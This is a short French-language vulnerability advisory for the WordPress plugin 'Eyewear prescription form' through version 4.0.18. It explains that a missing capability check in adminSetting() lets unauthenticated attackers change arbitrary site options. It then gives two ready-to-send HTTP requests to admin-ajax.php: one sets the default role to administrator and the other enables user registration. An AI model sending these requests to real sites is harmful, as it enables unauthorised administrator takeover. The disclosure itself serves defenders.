
Eyewear prescription form <= 4.0.18 - Autorisation manquante pour une mise à jour non authentifiée d'options arbitraires
Formulaire de prescription de lunettes <= 4.0.18 - Absence d'autorisation menant à une mise à jour arbitraire des options par des non-authentifiés
Le plugin Formulaire de prescription de lunettes pour WordPress est vulnérable à une modification non autorisée des données pouvant conduire à une escalade de privilèges en raison d'un contrôle de capacité manquant sur la fonction adminSetting() dans toutes les versions jusqu'à la version 4.0.18 incluse. Cela permet à des attaquants non authentifiés de mettre à jour des options arbitraires sur le site WordPress. Cela peut être exploité pour modifier le rôle par défaut lors de l'inscription en administrateur et activer l'enregistrement des utilisateurs, permettant aux attaquants d'obtenir un accès administrateur au site vulnérable.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
action=adminSetting&data[settingCode]=default_role&data[settingValue]=administrator
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
action=adminSetting&data[settingCode]=users_can_register&data[settingValue]=1